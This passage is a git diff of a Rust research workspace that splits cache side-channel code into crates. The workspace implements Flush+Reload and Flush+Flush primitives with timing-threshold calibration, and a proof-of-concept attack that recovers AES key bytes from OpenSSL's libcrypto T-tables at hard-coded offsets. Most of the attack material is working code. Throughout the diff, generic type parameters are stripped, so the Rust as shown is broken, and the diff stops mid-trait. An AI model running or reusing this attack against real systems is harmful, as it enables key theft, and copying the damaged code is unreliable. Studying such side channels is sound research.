diff --git a/.idea/DendrobatesTinctoriusAzureus.iml b/.idea/DendrobatesTinctoriusAzureus.iml
index 9392cfb..1f78c4a 100644
--- a/.idea/DendrobatesTinctoriusAzureus.iml
+++ b/.idea/DendrobatesTinctoriusAzureus.iml
@@ -32,6 +32,12 @@
+
+
+
+
+
+
diff --git a/Cargo.lock b/Cargo.lock
index d588279..b5872b0 100644
--- a/Cargo.lock
+++ b/Cargo.lock
@@ -4,7 +4,10 @@
name = "aes-t-tables"
version = "0.1.0"
dependencies = [
+ "cache_side_channel",
"cache_utils",
+ "flush_flush",
+ "flush_reload",
"memmap2",
"nix",
"openssl",
@@ -39,6 +42,10 @@ version = "1.0.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "cdb031dd78e28731d87d56cc8ffef4a8f36ca26c38fe2de700543e627f8a464a"
+[[package]]
+name = "basic_timing_cache_channel"
+version = "0.1.0"
+
[[package]]
name = "bit_field"
version = "0.9.0"
@@ -66,6 +73,10 @@ dependencies = [
"bit_field 0.10.1",
]
+[[package]]
+name = "cache_side_channel"
+version = "0.1.0"
+
[[package]]
name = "cache_utils"
version = "0.1.0"
@@ -94,6 +105,16 @@ version = "0.1.10"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "4785bdd1c96b2a846b2bd7cc02e86b6b3dbf14e7e53446c4f54c92a361040822"
+[[package]]
+name = "covert_channels_evaluation"
+version = "0.1.0"
+dependencies = [
+ "bit_field 0.10.1",
+ "cache_utils",
+ "rand",
+ "turn_lock",
+]
+
[[package]]
name = "cpuid"
version = "0.1.0"
@@ -122,6 +143,23 @@ version = "1.6.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "e78d4f1cc4ae33bbfc157ed5d5a5ef3bc29227303d595861deb238fcec4e9457"
+[[package]]
+name = "flush_flush"
+version = "0.1.0"
+dependencies = [
+ "cache_side_channel",
+ "cache_utils",
+ "nix",
+]
+
+[[package]]
+name = "flush_reload"
+version = "0.1.0"
+dependencies = [
+ "cache_side_channel",
+ "cache_utils",
+]
+
[[package]]
name = "foreign-types"
version = "0.3.2"
@@ -336,6 +374,10 @@ version = "1.1.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "a2eb9349b6444b326872e140eb1cf5e7c522154d69e7a0ffb0fb81c06b37543f"
+[[package]]
+name = "turn_lock"
+version = "0.1.0"
+
[[package]]
name = "vcpkg"
version = "0.2.10"
diff --git a/Cargo.toml b/Cargo.toml
index 179c8ed..f6756fc 100644
--- a/Cargo.toml
+++ b/Cargo.toml
@@ -6,6 +6,11 @@ members = [
"cache_utils",
"cpuid",
"aes-t-tables",
+ "covert_channels_evaluation",
+ "cache_side_channel",
+ "flush_reload",
+ "flush_flush",
+ "basic_timing_cache_channel",
"turn_lock",
]
diff --git a/aes-t-tables/Cargo.toml b/aes-t-tables/Cargo.toml
index 295214c..60fc705 100644
--- a/aes-t-tables/Cargo.toml
+++ b/aes-t-tables/Cargo.toml
@@ -13,3 +13,6 @@ cache_utils = { path = "../cache_utils" }
memmap2 = "0.1.0"
rand = "0.7.3"
nix = "0.18.0"
+cache_side_channel = { path = "../cache_side_channel" }
+flush_flush = { path = "../flush_flush" }
+flush_reload = { path = "../flush_reload" }
diff --git a/aes-t-tables/src/lib.rs b/aes-t-tables/src/lib.rs
index 07c13ea..23e6ca3 100644
--- a/aes-t-tables/src/lib.rs
+++ b/aes-t-tables/src/lib.rs
@@ -1,21 +1,21 @@
-#![feature(specialization)]
+//#![feature(specialization)]
#![feature(unsafe_block_in_unsafe_fn)]
#![deny(unsafe_op_in_unsafe_fn)]
use openssl::aes;
use crate::CacheStatus::Miss;
+use cache_side_channel::table_side_channel::TableCacheSideChannel;
+use cache_side_channel::CacheStatus;
use memmap2::Mmap;
use openssl::aes::aes_ige;
use openssl::symm::Mode;
use rand::seq::SliceRandom;
use rand::thread_rng;
use std::collections::HashMap;
-use std::fmt::Debug;
use std::fs::File;
use std::path::Path;
-pub mod naive_flush_and_reload;
// Generic AES T-table attack flow
// Modularisation :
@@ -37,323 +37,11 @@ pub mod naive_flush_and_reload;
// an attacker measurement
// a calibration victim
-#[derive(Debug, PartialEq, Eq, Clone, Copy)]
-pub enum CacheStatus {
- Hit,
- Miss,
-}
-
-#[derive(Debug, PartialEq, Eq, Clone, Copy)]
-pub enum ChannelFatalError {
- Oops,
-}
-
-pub enum SideChannelError {
- NeedRecalibration,
- FatalError(ChannelFatalError),
- AddressNotReady(*const u8),
- AddressNotCalibrated(*const u8),
-}
-
-/*
-pub enum CacheSideChannel {
- SingleAddr,
- MultipleAddr,
-}
-*/
// Access Driven
-pub trait SimpleCacheSideChannel {
- // TODO
-}
-
-pub struct TableAttackResult {
- pub addr: *const u8,
- hit: u32,
- miss: u32,
-}
-
-impl TableAttackResult {
- fn get(&self, cache_status: CacheStatus) -> u32 {
- match cache_status {
- CacheStatus::Hit => self.hit,
- CacheStatus::Miss => self.miss,
- }
- }
-}
-
-pub trait TableCacheSideChannel {
- //type ChannelFatalError: Debug;
- /// # Safety
- ///
- /// addresses must contain only valid pointers to read.
- unsafe fn calibrate(
- &mut self,
- addresses: impl IntoIterator- + Clone,
- ) -> Result<(), ChannelFatalError>;
- /// # Safety
- ///
- /// addresses must contain only valid pointers to read.
- unsafe fn attack<'a, 'b, 'c>(
- &'a mut self,
- addresses: impl Iterator
- + Clone,
- victim: &'b dyn Fn(),
- num_iteration: u32,
- ) -> Result, ChannelFatalError>;
-}
-
-pub trait SingleAddrCacheSideChannel: Debug {
- //type SingleChannelFatalError: Debug;
- /// # Safety
- ///
- /// addr must be a valid pointer to read.
- unsafe fn test_single(&mut self, addr: *const u8) -> Result;
- /// # Safety
- ///
- /// addr must be a valid pointer to read.
- unsafe fn prepare_single(&mut self, addr: *const u8) -> Result<(), SideChannelError>;
- fn victim_single(&mut self, operation: &dyn Fn());
- /// # Safety
- ///
- /// addresses must contain only valid pointers to read.
- unsafe fn calibrate_single(
- &mut self,
- addresses: impl IntoIterator
- + Clone,
- ) -> Result<(), ChannelFatalError>;
-}
-
-pub trait MultipleAddrCacheSideChannel: Debug {
- const MAX_ADDR: u32;
- /// # Safety
- ///
- /// addresses must contain only valid pointers to read.
- unsafe fn test<'a, 'b, 'c>(
- &'a mut self,
- addresses: &'b mut (impl Iterator
- + Clone),
- ) -> Result, SideChannelError>;
-
- /// # Safety
- ///
- /// addresses must contain only valid pointers to read.
- unsafe fn prepare<'a, 'b, 'c>(
- &'a mut self,
- addresses: &'b mut (impl Iterator
- + Clone),
- ) -> Result<(), SideChannelError>;
- fn victim(&mut self, operation: &dyn Fn());
-
- /// # Safety
- ///
- /// addresses must contain only valid pointers to read.
- unsafe fn calibrate(
- &mut self,
- addresses: impl IntoIterator
- + Clone,
- ) -> Result<(), ChannelFatalError>;
-}
-
-impl TableCacheSideChannel for T {
- default unsafe fn calibrate(
- &mut self,
- addresses: impl IntoIterator
- + Clone,
- ) -> Result<(), ChannelFatalError> {
- unsafe { self.calibrate_single(addresses) }
- }
- //type ChannelFatalError = T::SingleChannelFatalError;
-
- default unsafe fn attack<'a, 'b, 'c>(
- &'a mut self,
- addresses: impl Iterator
- + Clone,
- victim: &'b dyn Fn(),
- num_iteration: u32,
- ) -> Result, ChannelFatalError> {
- let mut result = Vec::new();
-
- for addr in addresses {
- let mut hit = 0;
- let mut miss = 0;
- for iteration in 0..100 {
- match unsafe { self.prepare_single(*addr) } {
- Ok(_) => {}
- Err(e) => match e {
- SideChannelError::NeedRecalibration => unimplemented!(),
- SideChannelError::FatalError(e) => return Err(e),
- SideChannelError::AddressNotReady(_addr) => panic!(),
- SideChannelError::AddressNotCalibrated(_addr) => unimplemented!(),
- },
- }
- self.victim_single(victim);
- let r = unsafe { self.test_single(*addr) };
- match r {
- Ok(status) => {}
- Err(e) => match e {
- SideChannelError::NeedRecalibration => panic!(),
- SideChannelError::FatalError(e) => {
- return Err(e);
- }
- _ => panic!(),
- },
- }
- }
- for _iteration in 0..num_iteration {
- match unsafe { self.prepare_single(*addr) } {
- Ok(_) => {}
- Err(e) => match e {
- SideChannelError::NeedRecalibration => unimplemented!(),
- SideChannelError::FatalError(e) => return Err(e),
- SideChannelError::AddressNotReady(_addr) => panic!(),
- SideChannelError::AddressNotCalibrated(_addr) => unimplemented!(),
- },
- }
- self.victim_single(victim);
- let r = unsafe { self.test_single(*addr) };
- match r {
- Ok(status) => match status {
- CacheStatus::Hit => {
- hit += 1;
- }
- CacheStatus::Miss => {
- miss += 1;
- }
- },
- Err(e) => match e {
- SideChannelError::NeedRecalibration => panic!(),
- SideChannelError::FatalError(e) => {
- return Err(e);
- }
- _ => panic!(),
- },
- }
- }
- result.push(TableAttackResult {
- addr: *addr,
- hit,
- miss,
- });
- }
- Ok(result)
- }
-}
-
// TODO
-impl SingleAddrCacheSideChannel for T {
- unsafe fn test_single(&mut self, addr: *const u8) -> Result {
- let addresses = vec![addr];
- unsafe { self.test(&mut addresses.iter()) }.map(|v| v[0].1)
- }
-
- unsafe fn prepare_single(&mut self, addr: *const u8) -> Result<(), SideChannelError> {
- let addresses = vec![addr];
- unsafe { self.prepare(&mut addresses.iter()) }
- }
-
- fn victim_single(&mut self, operation: &dyn Fn()) {
- self.victim(operation);
- }
-
- unsafe fn calibrate_single(
- &mut self,
- addresses: impl IntoIterator
- + Clone,
- ) -> Result<(), ChannelFatalError> {
- unsafe { self.calibrate(addresses) }
- }
-}
-
-// TODO limit number of simultaneous tested address + randomise order ?
-
-impl TableCacheSideChannel for T {
- unsafe fn calibrate(
- &mut self,
- addresses: impl IntoIterator
- + Clone,
- ) -> Result<(), ChannelFatalError> {
- unsafe { self.calibrate(addresses) }
- }
- //type ChannelFatalError = T::MultipleChannelFatalError;
-
- /// # Safety
- ///
- /// addresses must contain only valid pointers to read.
- unsafe fn attack<'a, 'b, 'c>(
- &'a mut self,
- mut addresses: impl Iterator
- + Clone,
- victim: &'b dyn Fn(),
- num_iteration: u32,
- ) -> Result, ChannelFatalError> {
- let mut v = Vec::new();
- while let Some(addr) = addresses.next() {
- let mut batch = Vec::new();
- batch.push(*addr);
- let mut hits: HashMap<*const u8, u32> = HashMap::new();
- let mut misses: HashMap<*const u8, u32> = HashMap::new();
- for i in 1..T::MAX_ADDR {
- if let Some(addr) = addresses.next() {
- batch.push(*addr);
- } else {
- break;
- }
- }
- for i in 0..100 {
- // TODO Warmup
- }
- for i in 0..num_iteration {
- match unsafe { MultipleAddrCacheSideChannel::prepare(self, &mut batch.iter()) } {
- Ok(_) => {}
- Err(e) => match e {
- SideChannelError::NeedRecalibration => unimplemented!(),
- SideChannelError::FatalError(e) => return Err(e),
- SideChannelError::AddressNotReady(_addr) => panic!(),
- SideChannelError::AddressNotCalibrated(addr) => {
- eprintln!(
- "Addr: {:p}\n\
- {:#?}",
- addr, self
- );
- unimplemented!()
- }
- },
- }
- MultipleAddrCacheSideChannel::victim(self, victim);
-
- let r = unsafe { MultipleAddrCacheSideChannel::test(self, &mut batch.iter()) }; // Fixme error handling
- match r {
- Err(e) => match e {
- SideChannelError::NeedRecalibration => {
- panic!();
- }
- SideChannelError::FatalError(e) => {
- return Err(e);
- }
- _ => {
- panic!();
- }
- },
- Ok(vector) => {
- for (addr, status) in vector {
- match status {
- CacheStatus::Hit => {
- *hits.entry(addr).or_default() += 1;
- }
- CacheStatus::Miss => {
- *misses.entry(addr).or_default() += 1;
- }
- }
- }
- }
- }
- }
-
- for addr in batch {
- v.push(TableAttackResult {
- addr,
- hit: *hits.get(&addr).unwrap_or(&0u32),
- miss: *misses.get(&addr).unwrap_or(&0u32),
- })
- }
- }
- Ok(v)
- }
-}
-
pub struct AESTTableParams<'a> {
pub num_encryptions: u32,
pub key: [u8; 32],
@@ -361,6 +49,8 @@ pub struct AESTTableParams<'a> {
pub te: [isize; 4],
}
+const KEY_BYTE_TO_ATTACK: usize = 0;
+
/// # Safety
///
/// te need to refer to the correct t tables offset in the openssl library at path.
@@ -383,9 +73,6 @@ pub unsafe fn attack_t_tables_poc(
let key_struct = aes::AesKey::new_encrypt(¶meters.key).unwrap();
- //let mut plaintext = [0u8; 16];
- //let mut result = [0u8; 16];
-
let mut timings: HashMap<*const u8, HashMap> = HashMap::new();
let mut addresses: Vec<*const u8> = parameters
@@ -409,13 +96,12 @@ pub unsafe fn attack_t_tables_poc(
}
for b in (u8::min_value()..=u8::max_value()).step_by(16) {
- //plaintext[0] = b;
eprintln!("Probing with b = {:x}", b);
// fixme magic numbers
let victim = || {
let mut plaintext = [0u8; 16];
- plaintext[0] = b;
+ plaintext[KEY_BYTE_TO_ATTACK] = b;
for byte in plaintext.iter_mut().skip(1) {
*byte = rand::random();
}
diff --git a/aes-t-tables/src/main.rs b/aes-t-tables/src/main.rs
index 7f07565..8aa3ba4 100644
--- a/aes-t-tables/src/main.rs
+++ b/aes-t-tables/src/main.rs
@@ -1,446 +1,11 @@
#![feature(unsafe_block_in_unsafe_fn)]
#![deny(unsafe_op_in_unsafe_fn)]
-use aes_t_tables::SideChannelError::{AddressNotCalibrated, AddressNotReady};
-use aes_t_tables::{
- attack_t_tables_poc, AESTTableParams, CacheStatus, ChannelFatalError,
- MultipleAddrCacheSideChannel, SideChannelError, SingleAddrCacheSideChannel,
-};
-use cache_utils::calibration::{
- get_cache_slicing, only_flush, CalibrateOperation2T, CalibrationOptions, HistParams, Verbosity,
- CFLUSH_BUCKET_NUMBER, CFLUSH_BUCKET_SIZE, CFLUSH_NUM_ITER,
-};
-use cache_utils::{find_core_per_socket, flush, maccess, noop};
-use std::collections::{HashMap, HashSet};
-use std::path::Path;
-
-use aes_t_tables::naive_flush_and_reload::*;
-
-type VPN = usize;
-type Slice = u8;
-
-use cache_utils::calibration::calibrate_fixed_freq_2_thread;
-use cache_utils::complex_addressing::CacheSlicing;
-use core::fmt;
-use nix::sched::{sched_getaffinity, sched_setaffinity, CpuSet};
+use aes_t_tables::{attack_t_tables_poc, AESTTableParams};
+use flush_flush::{FlushAndFlush, SingleFlushAndFlush};
+use flush_reload::naive::*;
+use nix::sched::sched_setaffinity;
use nix::unistd::Pid;
-use std::fmt::{Debug, Formatter};
-use std::i8::MAX; // TODO
-
-#[derive(Debug)]
-struct Threshold {
- pub value: u64,
- pub miss_faster_than_hit: bool,
-}
-
-impl Threshold {
- pub fn is_hit(&self, time: u64) -> bool {
- self.miss_faster_than_hit && time >= self.value
- || !self.miss_faster_than_hit && time < self.value
- }
-}
-
-struct FlushAndFlush {
- thresholds: HashMap>,
- addresses_ready: HashSet<*const u8>,
- slicing: CacheSlicing,
- original_affinities: CpuSet,
-}
-
-#[derive(Debug)]
-struct SingleFlushAndFlush(FlushAndFlush);
-
-impl SingleFlushAndFlush {
- pub fn new() -> Option {
- FlushAndFlush::new().map(|ff| SingleFlushAndFlush(ff))
- }
-}
-
-impl SingleAddrCacheSideChannel for SingleFlushAndFlush {
- unsafe fn test_single(&mut self, addr: *const u8) -> Result {
- unsafe { self.0.test_single(addr) }
- }
-
- unsafe fn prepare_single(&mut self, addr: *const u8) -> Result<(), SideChannelError> {
- unsafe { self.0.prepare_single(addr) }
- }
-
- fn victim_single(&mut self, operation: &dyn Fn()) {
- self.0.victim_single(operation)
- }
-
- unsafe fn calibrate_single(
- &mut self,
- addresses: impl IntoIterator
- + Clone,
- ) -> Result<(), ChannelFatalError> {
- unsafe { self.0.calibrate_single(addresses) }
- }
-}
-
-// Current issue : hash function trips borrow checker.
-// Also need to finish implementing the calibration logic
-
-impl FlushAndFlush {
- pub fn new() -> Option {
- if let Some(slicing) = get_cache_slicing(find_core_per_socket()) {
- if !slicing.can_hash() {
- return None;
- }
-
- let old = sched_getaffinity(Pid::from_raw(0)).unwrap();
-
- let ret = Self {
- thresholds: Default::default(),
- addresses_ready: Default::default(),
- slicing,
- original_affinities: old,
- };
- Some(ret)
- } else {
- None
- }
- }
-
- fn get_slice(&self, addr: *const u8) -> Slice {
- self.slicing.hash(addr as usize).unwrap()
- }
-}
-
-impl Drop for FlushAndFlush {
- fn drop(&mut self) {
- sched_setaffinity(Pid::from_raw(0), &self.original_affinities).unwrap();
- }
-}
-
-impl Debug for FlushAndFlush {
- fn fmt(&self, f: &mut Formatter<'_>) -> fmt::Result {
- f.debug_struct("FlushAndFlush")
- .field("thresholds", &self.thresholds)
- .field("addresses_ready", &self.addresses_ready)
- .field("slicing", &self.slicing)
- .finish()
- }
-}
-
-const PAGE_LEN: usize = 1 << 12;
-
-fn get_vpn(p: *const T) -> usize {
- (p as usize) & (!(PAGE_LEN - 1)) // FIXME
-}
-
-fn cum_sum(vector: &[u32]) -> Vec {
- let len = vector.len();
- let mut res = vec![0; len];
- res[0] = vector[0];
- for i in 1..len {
- res[i] = res[i - 1] + vector[i];
- }
- assert_eq!(len, res.len());
- assert_eq!(len, vector.len());
- res
-}
-
-impl MultipleAddrCacheSideChannel for FlushAndFlush {
- const MAX_ADDR: u32 = 3;
-
- unsafe fn test<'a, 'b, 'c>(
- &'a mut self,
- addresses: &'b mut (impl Iterator
- + Clone),
- ) -> Result, SideChannelError> {
- let mut result = Vec::new();
- let mut tmp = Vec::new();
- let mut i = 0;
- for addr in addresses {
- i += 1;
- let t = unsafe { only_flush(*addr) };
- tmp.push((addr, t));
- if i == Self::MAX_ADDR {
- break;
- }
- }
- for (addr, time) in tmp {
- if !self.addresses_ready.contains(&addr) {
- return Err(AddressNotReady(*addr));
- }
- let vpn: VPN = (*addr as usize) & (!0xfff); // FIXME
- let slice = self.get_slice(*addr);
- let threshold = &self.thresholds[&vpn][&slice];
- // refactor this into a struct threshold method ?
- if threshold.is_hit(time) {
- result.push((*addr, CacheStatus::Hit))
- } else {
- result.push((*addr, CacheStatus::Miss))
- }
- }
- Ok(result)
- }
-
- unsafe fn prepare<'a, 'b, 'c>(
- &'a mut self,
- addresses: &'b mut (impl Iterator
- + Clone),
- ) -> Result<(), SideChannelError> {
- use core::arch::x86_64 as arch_x86;
- let mut i = 0;
- let addresses_cloned = addresses.clone();
- for addr in addresses_cloned {
- i += 1;
- let vpn: VPN = get_vpn(*addr);
- let slice = self.get_slice(*addr);
- if self.addresses_ready.contains(&addr) {
- continue;
- }
- if !self.thresholds.contains_key(&vpn) || !self.thresholds[&vpn].contains_key(&slice) {
- return Err(AddressNotCalibrated(*addr));
- }
- if i == Self::MAX_ADDR {
- break;
- }
- }
- i = 0;
- for addr in addresses {
- i += 1;
- unsafe { flush(*addr) };
- self.addresses_ready.insert(*addr);
- if i == Self::MAX_ADDR {
- break;
- }
- }
- unsafe { arch_x86::_mm_mfence() };
- Ok(())
- }
-
- fn victim(&mut self, operation: &dyn Fn()) {
- operation(); // TODO use a different helper core ?
- }
-
- unsafe fn calibrate(
- &mut self,
- addresses: impl IntoIterator
- + Clone,
- ) -> Result<(), ChannelFatalError> {
- let mut pages = HashMap::>::new();
- for addr in addresses {
- let page = get_vpn(addr);
- pages.entry(page).or_insert_with(HashSet::new).insert(addr);
- }
-
- let core_per_socket = find_core_per_socket();
-
- let operations = [
- CalibrateOperation2T {
- prepare: maccess::,
- op: only_flush,
- name: "clflush_remote_hit",
- display_name: "clflush remote hit",
- },
- CalibrateOperation2T {
- prepare: noop::,
- op: only_flush,
- name: "clflush_miss",
- display_name: "clflush miss",
- },
- ];
- const HIT_INDEX: usize = 0;
- const MISS_INDEX: usize = 1;
-
- // Generate core iterator
- let mut core_pairs: Vec<(usize, usize)> = Vec::new();
-
- let old = sched_getaffinity(Pid::from_raw(0)).unwrap();
-
- for i in 0..CpuSet::count() {
- if old.is_set(i).unwrap() {
- core_pairs.push((i, i));
- }
- }
-
- // Probably needs more metadata
- let mut per_core: HashMap>> =
- HashMap::new();
-
- let mut core_averages: HashMap = HashMap::new();
-
- for (page, _) in pages {
- let p = page as *const u8;
- let r = unsafe {
- calibrate_fixed_freq_2_thread(
- p,
- 64, // FIXME : MAGIC
- PAGE_LEN as isize, // MAGIC
- &mut core_pairs.clone().into_iter(),
- &operations,
- CalibrationOptions {
- hist_params: HistParams {
- bucket_number: CFLUSH_BUCKET_NUMBER,
- bucket_size: CFLUSH_BUCKET_SIZE,
- iterations: CFLUSH_NUM_ITER << 1,
- },
- verbosity: Verbosity::NoOutput,
- optimised_addresses: true,
- },
- core_per_socket,
- )
- };
-
- /* TODO refactor a good chunk of calibration result analysis to make thresholds in a separate function
- Generating Cumulative Sums and then using that to compute error count for each possible threshold is a recurring joke.
- It might be worth in a second time to refactor this to handle more generic strategies (such as double thresholds)
- What about handling non attributes values (time values that are not attributed as hit or miss)
- */
-
- for result2t in r {
- if result2t.main_core != result2t.helper_core {
- panic!("Unexpected core numbers");
- }
- let core = result2t.main_core;
- match result2t.res {
- Err(e) => panic!("Oops: {:#?}", e),
- Ok(results_1t) => {
- for r1t in results_1t {
- let offset = r1t.offset;
- let addr = unsafe { p.offset(offset) };
- let slice = self.get_slice(addr);
- let miss_hist = &r1t.histogram[MISS_INDEX];
- let hit_hist = &r1t.histogram[HIT_INDEX];
- if miss_hist.len() != hit_hist.len() {
- panic!("Maformed results");
- }
- let len = miss_hist.len();
- let miss_cum_sum = cum_sum(miss_hist);
- let hit_cum_sum = cum_sum(hit_hist);
- let miss_total = miss_cum_sum[len - 1];
- let hit_total = hit_cum_sum[len - 1];
-
- // Threshold is less than equal => miss, strictly greater than => hit
- let mut error_miss_less_than_hit = vec![0; len - 1];
- // Threshold is less than equal => hit, strictly greater than => miss
- let mut error_hit_less_than_miss = vec![0; len - 1];
-
- let mut min_error_hlm = u32::max_value();
- let mut min_error_mlh = u32::max_value();
-
- for i in 0..(len - 1) {
- error_hit_less_than_miss[i] =
- miss_cum_sum[i] + (hit_total - hit_cum_sum[i]);
- error_miss_less_than_hit[i] =
- hit_cum_sum[i] + (miss_total - miss_cum_sum[i]);
-
- if error_hit_less_than_miss[i] < min_error_hlm {
- min_error_hlm = error_hit_less_than_miss[i];
- }
- if error_miss_less_than_hit[i] < min_error_mlh {
- min_error_mlh = error_miss_less_than_hit[i];
- }
- }
-
- let hlm = min_error_hlm < min_error_mlh;
-
- let (errors, min_error) = if hlm {
- (&error_hit_less_than_miss, min_error_hlm)
- } else {
- (&error_miss_less_than_hit, min_error_mlh)
- };
-
- let mut potential_thresholds = Vec::new();
-
- for i in 0..errors.len() {
- if errors[i] == min_error {
- let num_true_hit;
- let num_false_hit;
- let num_true_miss;
- let num_false_miss;
- if hlm {
- num_true_hit = hit_cum_sum[i];
- num_false_hit = miss_cum_sum[i];
- num_true_miss = miss_total - num_false_hit;
- num_false_miss = hit_total - num_true_hit;
- } else {
- num_true_miss = miss_cum_sum[i];
- num_false_miss = hit_cum_sum[i];
- num_true_hit = hit_total - num_false_miss;
- num_false_hit = miss_total - num_true_miss;
- }
- potential_thresholds.push((
- i,
- num_true_hit,
- num_false_hit,
- num_true_miss,
- num_false_miss,
- min_error as f32 / (hit_total + miss_total) as f32,
- ));
- }
- }
-
- let index = (potential_thresholds.len() - 1) / 2;
- let (threshold, _, _, _, _, error_rate) = potential_thresholds[index];
- // insert in per_core
- if per_core
- .entry(core)
- .or_insert_with(HashMap::new)
- .entry(page)
- .or_insert_with(HashMap::new)
- .insert(
- slice,
- (
- Threshold {
- value: threshold as u64, // FIXME the bucket to time conversion
- miss_faster_than_hit: !hlm,
- },
- error_rate,
- ),
- )
- .is_some()
- {
- panic!("Duplicate slice result");
- }
- let core_average = core_averages.get(&core).unwrap_or(&(0.0, 0));
- let new_core_average =
- (core_average.0 + error_rate, core_average.1 + 1);
- core_averages.insert(core, new_core_average);
- }
- }
- }
- }
- }
-
- // We now have a HashMap associating stuffs to cores, iterate on it and select the best.
- let mut best_core = 0;
-
- let mut best_error_rate = {
- let ca = core_averages[&0];
- ca.0 / ca.1 as f32
- };
- for (core, average) in core_averages {
- let error_rate = average.0 / average.1 as f32;
- if error_rate < best_error_rate {
- best_core = core;
- best_error_rate = error_rate;
- }
- }
- let mut thresholds = HashMap::new();
- println!("Best core: {}, rate: {}", best_core, best_error_rate);
- let tmp = per_core.remove(&best_core).unwrap();
- for (page, per_page) in tmp {
- let page_entry = thresholds.entry(page).or_insert_with(HashMap::new);
- for (slice, per_slice) in per_page {
- println!(
- "page: {:x}, slice: {}, threshold: {:?}, error_rate: {}",
- page, slice, per_slice.0, per_slice.1
- );
- page_entry.insert(slice, per_slice.0);
- }
- }
- self.thresholds = thresholds;
- println!("{:#?}", self.thresholds);
-
- // TODO handle error better for affinity setting and other issues.
-
- self.addresses_ready.clear();
-
- let mut cpuset = CpuSet::new();
- cpuset.set(best_core).unwrap();
- sched_setaffinity(Pid::from_raw(0), &cpuset).unwrap();
- Ok(())
- }
-}
+use std::path::Path;
const KEY2: [u8; 32] = [
0x51, 0x4d, 0xab, 0x12, 0xff, 0xdd, 0xb3, 0x32, 0x52, 0x8f, 0xbb, 0x1d, 0xec, 0x45, 0xce, 0xcc,
@@ -452,12 +17,12 @@ const KEY2: [u8; 32] = [
// 00000000001cc080 r Te1
// 00000000001cbc80 r Te2
// 00000000001cb880 r Te3
-const TE_CYBER_COBAYE : [isize;4] = [0x1cc480, 0x1cc080, 0x1cbc80, 0x1cb880];
+const TE_CYBER_COBAYE: [isize; 4] = [0x1cc480, 0x1cc080, 0x1cbc80, 0x1cb880];
-const TE_CITRON_VERT : [isize; 4] = [0x1b5d40, 0x1b5940, 0x1b5540, 0x1b5140];
+const TE_CITRON_VERT: [isize; 4] = [0x1b5d40, 0x1b5940, 0x1b5540, 0x1b5140];
fn main() {
- let open_sslpath = Path::new(env!("OPENSSL_DIR")).join("lib/libcrypto.so");
+ let openssl_path = Path::new(env!("OPENSSL_DIR")).join("lib/libcrypto.so");
let mut side_channel = NaiveFlushAndReload::from_threshold(220);
let te = TE_CITRON_VERT;
unsafe {
@@ -467,7 +32,7 @@ fn main() {
num_encryptions: 1 << 12,
key: [0; 32],
te: te, // adjust me (should be in decreasing order)
- openssl_path: &open_sslpath,
+ openssl_path: &openssl_path,
},
)
}; /**/
@@ -478,36 +43,35 @@ fn main() {
num_encryptions: 1 << 12,
key: KEY2,
te: te,
- openssl_path: &open_sslpath,
+ openssl_path: &openssl_path,
},
)
};
- {
- let mut side_channel_ff = FlushAndFlush::new().unwrap();
- unsafe {
- attack_t_tables_poc(
- &mut side_channel_ff,
- AESTTableParams {
- num_encryptions: 1 << 12,
- key: [0; 32],
- te: te, // adjust me (should be in decreasing order)
- openssl_path: &open_sslpath,
- },
- )
- };
- }
- {
- let mut side_channel_ff = SingleFlushAndFlush::new().unwrap();
- unsafe {
- attack_t_tables_poc(
- &mut side_channel_ff,
- AESTTableParams {
- num_encryptions: 1 << 12,
- key: KEY2,
- te: te, // adjust me (should be in decreasing order)
- openssl_path: &open_sslpath,
- },
- )
- };
- }
+ let (mut side_channel_ff, old, core) = FlushAndFlush::new_any_single_core().unwrap();
+ unsafe {
+ attack_t_tables_poc(
+ &mut side_channel_ff,
+ AESTTableParams {
+ num_encryptions: 1 << 12,
+ key: [0; 32],
+ te: te, // adjust me (should be in decreasing order)
+ openssl_path: &openssl_path,
+ },
+ )
+ };
+
+ sched_setaffinity(Pid::from_raw(0), &old);
+ let (mut side_channel_ff, old, core) = SingleFlushAndFlush::new_any_single_core().unwrap();
+ unsafe {
+ attack_t_tables_poc(
+ &mut side_channel_ff,
+ AESTTableParams {
+ num_encryptions: 1 << 12,
+ key: KEY2,
+ te: te, // adjust me (should be in decreasing order)
+ openssl_path: &openssl_path,
+ },
+ )
+ };
+ sched_setaffinity(Pid::from_raw(0), &old);
}
diff --git a/cache_side_channel/Cargo.toml b/cache_side_channel/Cargo.toml
new file mode 100644
index 0000000..4a75860
--- /dev/null
+++ b/cache_side_channel/Cargo.toml
@@ -0,0 +1,9 @@
+[package]
+name = "cache_side_channel"
+version = "0.1.0"
+authors = ["GuillaumeDIDIER "]
+edition = "2018"
+
+# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
+
+[dependencies]
diff --git a/cache_side_channel/src/lib.rs b/cache_side_channel/src/lib.rs
new file mode 100644
index 0000000..2040155
--- /dev/null
+++ b/cache_side_channel/src/lib.rs
@@ -0,0 +1,104 @@
+#![feature(specialization)]
+#![feature(unsafe_block_in_unsafe_fn)]
+#![deny(unsafe_op_in_unsafe_fn)]
+
+use std::fmt::Debug;
+
+pub mod table_side_channel;
+
+#[derive(Debug, PartialEq, Eq, Clone, Copy)]
+pub enum CacheStatus {
+ Hit,
+ Miss,
+}
+
+#[derive(Debug, PartialEq, Eq, Clone, Copy)]
+pub enum ChannelFatalError {
+ Oops,
+}
+
+pub enum SideChannelError {
+ NeedRecalibration,
+ FatalError(ChannelFatalError),
+ AddressNotReady(*const u8),
+ AddressNotCalibrated(*const u8),
+}
+
+pub trait SingleAddrCacheSideChannel: Debug {
+ //type SingleChannelFatalError: Debug;
+ /// # Safety
+ ///
+ /// addr must be a valid pointer to read.
+ unsafe fn test_single(&mut self, addr: *const u8) -> Result;
+ /// # Safety
+ ///
+ /// addr must be a valid pointer to read.
+ unsafe fn prepare_single(&mut self, addr: *const u8) -> Result<(), SideChannelError>;
+ fn victim_single(&mut self, operation: &dyn Fn());
+ /// # Safety
+ ///
+ /// addresses must contain only valid pointers to read.
+ unsafe fn calibrate_single(
+ &mut self,
+ addresses: impl IntoIterator
- + Clone,
+ ) -> Result<(), ChannelFatalError>;
+}
+
+pub trait MultipleAddrCacheSideChannel: Debug {
+ const MAX_ADDR: u32;
+ /// # Safety
+ ///
+ /// addresses must contain only valid pointers to read.
+ unsafe fn test<'a, 'b, 'c>(
+ &'a mut self,
+ addresses: &'b mut (impl Iterator
- + Clone),
+ ) -> Result, SideChannelError>;
+
+ /// # Safety
+ ///
